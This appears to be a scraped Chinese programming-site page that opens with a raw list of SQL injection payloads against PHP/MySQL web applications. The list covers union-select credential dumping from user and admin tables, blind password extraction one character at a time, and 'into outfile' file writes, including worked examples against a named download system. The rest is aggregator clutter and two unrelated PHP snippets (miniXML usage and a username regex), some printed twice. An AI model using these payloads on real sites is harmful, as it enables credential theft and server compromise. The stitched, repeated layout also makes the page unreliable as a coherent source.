'%23
' and passWord='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
' and LENGTH(password)='6(探测密码长度)
' and LEFT(password,1)='m
' and LEFT(password,2)='my
…………………………依次类推
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* (可以是1或者=后直接跟)
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt (导出文件)
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END
例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹 变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
当前位置: 编程技术>php
本页文章导读:
▪高级php注入方法集锦第1/2页
'%23 ' and passWord='mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from user userid=.........
▪php minixml详解
使用方法如下,可以看到miniXML的使用,与ActiveLink-PHP-XML-Package-0.4.0相比,更加符合使用习惯,也更加的简单. $xmlDoc = new MiniXMLDoc(); $xmlRoot =& $xmlDoc->getRoot(); $childElement =& $xmlRoot->.........
▪php正则校验用户名介绍
<?php if (mb_ereg("^[\w\-\.]{1,32}$", $str)) { echo 'yes'; } else { echo 'no'; } ?>
......
[1]高级php注入方法集锦第1/2页
来源: 互联网 发布时间: 2013-11-30
[2]php minixml详解
来源: 互联网 发布时间: 2013-11-30
使用方法如下,可以看到miniXML的使用,与ActiveLink-PHP-XML-Package-0.4.0相比,更加符合使用习惯,也更加的简单.
$xmlDoc = new MiniXMLDoc();
$xmlRoot =& $xmlDoc->getRoot();
$childElement =& $xmlRoot->createChild(\'achild\');
$childElement->attribute(\'name\', \'annie\');
$childElement->text(\'This element has attributes and children, such as this\');
$image =& $childElement->createChild(\'image\');
$image->attribute(\'location\', \'http://psychogenic.com/image.png\');
$childElement->text(\'image and little\');
$orphan =& $xmlDoc->createElement(\'song\');
$orphan->text(\'tomorrow, tomorrow\');
$childElement->appendChild($orphan);
print $xmlDoc->toString();
添加一个子元素,有两种方式,第一种是直接该结点createChild,第二种是先xmlDoc先createElement,然后,该结点在appendChild.
最后打印出来的结果是:
<?xml version="1.0"?>
<achild name="annie" eyes="#0000FF" hair="#FF0000">
This element has attributes and children, such as this
<image location="http://psychogenic.com/image.png" />
image and little
<song> tomorrow, tomorrow </song>
</achild>
可以很明显的看得出,miniXML的使用方法是非常简单的,尤其是对于简单的保存数据的XML文件,更是如此,详细可以看miniXML提供的例子.此处不详说.
=========================================================================
解析
minixml文件结构是:
minixml.inc.php
------classes
-----------doc.inc.php element.inc.php node.inc.php treecomp.inc.php
详细的API解释说明,在官方网站上有介绍: http://minixml.psychogenic.com/api.html.
$xmlDoc = new MiniXMLDoc();
$xmlRoot =& $xmlDoc->getRoot();
$childElement =& $xmlRoot->createChild(\'achild\');
$childElement->attribute(\'name\', \'annie\');
$childElement->text(\'This element has attributes and children, such as this\');
$image =& $childElement->createChild(\'image\');
$image->attribute(\'location\', \'http://psychogenic.com/image.png\');
$childElement->text(\'image and little\');
$orphan =& $xmlDoc->createElement(\'song\');
$orphan->text(\'tomorrow, tomorrow\');
$childElement->appendChild($orphan);
print $xmlDoc->toString();
添加一个子元素,有两种方式,第一种是直接该结点createChild,第二种是先xmlDoc先createElement,然后,该结点在appendChild.
最后打印出来的结果是:
<?xml version="1.0"?>
<achild name="annie" eyes="#0000FF" hair="#FF0000">
This element has attributes and children, such as this
<image location="http://psychogenic.com/image.png" />
image and little
<song> tomorrow, tomorrow </song>
</achild>
可以很明显的看得出,miniXML的使用方法是非常简单的,尤其是对于简单的保存数据的XML文件,更是如此,详细可以看miniXML提供的例子.此处不详说.
=========================================================================
解析
minixml文件结构是:
minixml.inc.php
------classes
-----------doc.inc.php element.inc.php node.inc.php treecomp.inc.php
详细的API解释说明,在官方网站上有介绍: http://minixml.psychogenic.com/api.html.
[3]php正则校验用户名介绍
来源: 互联网 发布时间: 2013-11-30
<?php
if (mb_ereg("^[\w\-\.]{1,32}$", $str)) {
echo 'yes';
} else {
echo 'no';
}
?>
if (mb_ereg("^[\w\-\.]{1,32}$", $str)) {
echo 'yes';
} else {
echo 'no';
}
?>
最新技术文章: